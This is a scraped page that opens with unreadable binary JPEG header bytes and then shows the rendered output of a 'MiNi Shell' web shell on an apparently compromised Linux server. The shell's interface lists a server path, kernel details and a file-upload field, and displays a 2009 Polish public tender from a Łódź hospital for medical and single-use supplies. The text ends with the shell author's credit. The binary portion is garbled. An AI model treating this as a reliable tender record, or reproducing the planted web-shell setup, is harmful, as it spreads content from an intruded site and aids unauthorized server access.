JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090723/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090723/251484-N-2009.html

<p class="kh_header"><b>Łódź: 12A/MMSJ/09 Dostawy materiałów medycznych i sprzętu jednorazowego użytku.</b><br>
<b>Numer ogłoszenia: 251484 - 2009; data zamieszczenia: 23.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny ZOZ Uniwersytecki Szpital Kliniczny Nr 3 im. dr S. Sterlinga Uniwersytetu Medycznego w Łodzi , ul. dr. Seweryna Sterlinga 1/3/16, 91-425 Łódź, woj. łódzkie, tel. 042 63653 96, faks 042 6365396.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kardio-sterling.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> 12A/MMSJ/09 Dostawy materiałów medycznych i sprzętu jednorazowego użytku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawy materiałów medycznych i sprzętu jednorazowego użytku.
Przedmiot zamówienia w podziale na 13 pakietów:
Pakiet 1. Kraniki,
 Pakiet 2. Ostrza chirurgiczne,
 Pakiet 3. Cewniki,
 Pakiet 4. Dreny jałowe,
 Pakiet 5. Dreny,
 Pakiet 6. Linia do podawania gazów,
 Pakiet 7. Żele do EKG i USG,
 Pakiet 8. Podkłady i fartuchy,
 Pakiet 9. Akcesoria różne A1,
 Pakiet 10. Akcesoria różne A2,
 Pakiet 11. Akcesoria różne A3,
 Pakiet 12. Akcesoria różne A4,
 Pakiet 13. Akcesoria różne A5..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.10.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 13.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Nie dotyczy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Zamawiający dopuszcza do udziału w postępowaniu Wykonawców, którzy spełniają następujące warunki:
1.	Spełniają warunki określone przepisami art. 22 ust. 1 prawa zamówień publicznych. 
- posiadają uprawnienia do wykonywania określonej działalności lub czynności jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
- posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia,
- znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
- nie podlegają wykluczeniu z postępowania o udzielenie zamówienia,
Na potwierdzenie Zamawiający żąda:
1)	wypełnionego i podpisanego oświadczenia o spełnieniu warunków określonych w art. 22 Pzp - załącznik 3.1 SIWZ;
2)	wypełnionego i podpisanego oświadczenia Wykonawcy, że nie podlega wykluczeniu z postępowania na warunkach art. 24 Pzp - załącznik 3.2 SIWZ;
3)	aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;

Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w: 
- ppkt. 1.3 - składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: 
- nie otwarto jego likwidacji ani nie ogłoszono upadłości, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w powyżej, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, z zachowaniem terminów do wystawienia dokumentów.
2.	W celu potwierdzenia, że oferowane dostawy produktów odpowiadają wymaganiom określonym przez Zamawiającego, Zamawiający żąda:
a)	Opisów, fotografii (foldery, instrukcje, katalogi, dokumentacja producenta, itp.), z których będzie wynikać odpowiednio, że zaoferowane produkty spełniają postawione warunki,
b)	próbki - bezwzględnie wymagane dla Pakietu 2 poz.1 - Załącznik 2 SIWZ (ostrza chirurgiczne) oraz w przypadku braku dostatecznego udokumentowania poprzez opisy. Próbki te mogą być zwrócone Wykonawcy po zakończeniu postępowania na pisemny wniosek dołączony do oferty lub wliczone do pierwszej dostawy (w przypadku wyboru). Brak wniosku w ofercie oznacza przekazanie bezzwrotnych próbek do Zamawiającego. 
c)	Kserokopie deklaracji zgodności CE na przedmiot zamówienia wraz z tłumaczeniem na język polski. deklaracje zgodności muszą zawierać stwierdzenie, że proponowany przedmiot zamówienia spełnia wymogi Dyrektywy UE nr 93/42 o wyrobach medycznych lub 98/79 o wyrobach medycznych używanych do diagnozy in vitro. - Kserokopia potwierdzona za zgodność z oryginałem ze wskazaniem, której pozycji w pakiecie dotyczy.
3.	Ocena spełnienia warunków udziału w postępowaniu o zamówienie publiczne odbędzie się na zasadzie spełnia / nie spełnia.
4.	Zamawiający wykluczy wykonawców z ubiegania się o zamówienie publiczne, którzy: 
4.1.	 nie spełniają warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ust. 1 Pzp; uszczegółowionych powyżej w pkt. 1.1-1.3, 
4.2.	nie spełniają warunków udziału w postępowaniu o zamówienie publiczne, o których mowa w art. 24 ust. 1 i 2 Pzp,.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Wypełniony Formularz oferty wg załącznika nr 1 SIWZ.
2.	Wypełniony Przedmiot zamówienia -formularz cenowy wg załącznika nr 2 SIWZ. Należy dołączyć dodatkowo do oferty wypełniony załącznik nr 2 SIWZ w formie elektronicznej (na dyskietce lub płycie CD).
3.	Upoważnienie do podpisania oferty, o ile upoważnienie to nie wynika z innych dokumentów dołączonych do oferty. Upoważnienie w oryginale lub kopii poświadczonej notarialnie.
4.	W przypadku złożenia oferty przez podmioty występujące wspólnie - upoważnienie do:
a)	reprezentowania w postępowaniu o udzielenie zamówienia albo 
b)	reprezentowania i zawarcia umowy w sprawie zamówienia, 
- w oryginale bądź kopii potwierdzonej notarialnie dla wspólnego pełnomocnika (wynikające z art. 23 ustawy Pzp). 
5.	Dokumenty potwierdzające spełnienie warunków udziału w postępowaniu określonych szczegółowo w rozdziale VIII. Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków określone:
5.1	oświadczenie o spełnieniu warunków określonych w art. 22 Pzp - załącznik 3.1 SIWZ;
5.2	oświadczenie Wykonawcy, że nie podlega wykluczeniu z postępowania na podstawie art.24 Pzp - załącznik 3.2;
5.3	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokument określony w rozdziale VIII ppkt. 1.3;
5.4	opisy, fotografie (foldery, instrukcje, katalogi, dokumentacja producenta, itp.), z których będzie wynikać odpowiednio, że zaoferowane produkty spełniają postawione warunki;
5.5	próbki - bezwzględnie wymagane dla Pakietu 2 poz.1 - Załącznik 2 SIWZ (ostrza chirurgiczne) oraz w przypadku braku dostatecznego udokumentowania poprzez opisy. Próbki te mogą być zwrócone Wykonawcy po zakończeniu postępowania na pisemny wniosek dołączony do oferty lub wliczone do pierwszej dostawy (w przypadku wyboru). Brak wniosku w ofercie oznacza przekazanie bezzwrotnych próbek do Zamawiającego. 
5.6	Kserokopie deklaracji zgodności CE na przedmiot zamówienia wraz z tłumaczeniem na język polski. deklaracje zgodności muszą zawierać stwierdzenie, że proponowany przedmiot zamówienia spełnia wymogi Dyrektywy UE nr 93/42 o wyrobach medycznych lub 98/79 o wyrobach medycznych używanych do diagnozy in vitro. - Kserokopia potwierdzona za zgodność z oryginałem ze wskazaniem, której pozycji w pakiecie dotyczy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.kardio-sterling.lodz.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SP ZOZ Uniwersyteckiego Szpitala Klinicznego Nr 3 w Łodzi, ul. Sterlinga 1/3, bud. F, w pok. 13.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.07.2009 godzina 10:00, miejsce: SP ZOZ Uniwersyteckiego Szpitala Klinicznego Nr 3 w Łodzi, ul. Sterlinga 1/3,Sekretariat Dyrektora, pok. 16.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy..</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> 12A/MMSJ/09 Pakiet 1.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet 1. Kraniki.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> 12A/MMSJ/09 Pakiet 2.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet 2. Ostrza chirurgiczne.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> 12A/MMSJ/09 Pakiet 3.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet 3. Cewniki.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> 12A/MMSJ/09 Pakiet 4.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet 4. Dreny jałowe.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> 12A/MMSJ/09 Pakiet 5.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet 5. Dreny.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> 12A/MMSJ/09 Pakiet 6.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet 6. Linia do podawania gazów.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> 12A/MMSJ/09 Pakiet 7.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet 7. Żele do EKG i USG.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> 12A/MMSJ/09 Pakiet 8.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet 8. Podkłady i fartuchy.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> 12A/MMSJ/09 Pakiet 9.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet 9. Akcesoria różne A1.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> 12A/MMSJ/09 Pakiet 10.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet 10. Akcesoria różne A2.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> 12A/MMSJ/09  Pakiet 11.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet 11. Akcesoria różne A3.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> 12A/MMSJ/09  Pakiet 12.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet 12. Akcesoria różne A4.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> 12A/MMSJ/09  Pakiet 13.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet 13. Akcesoria różne A5.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com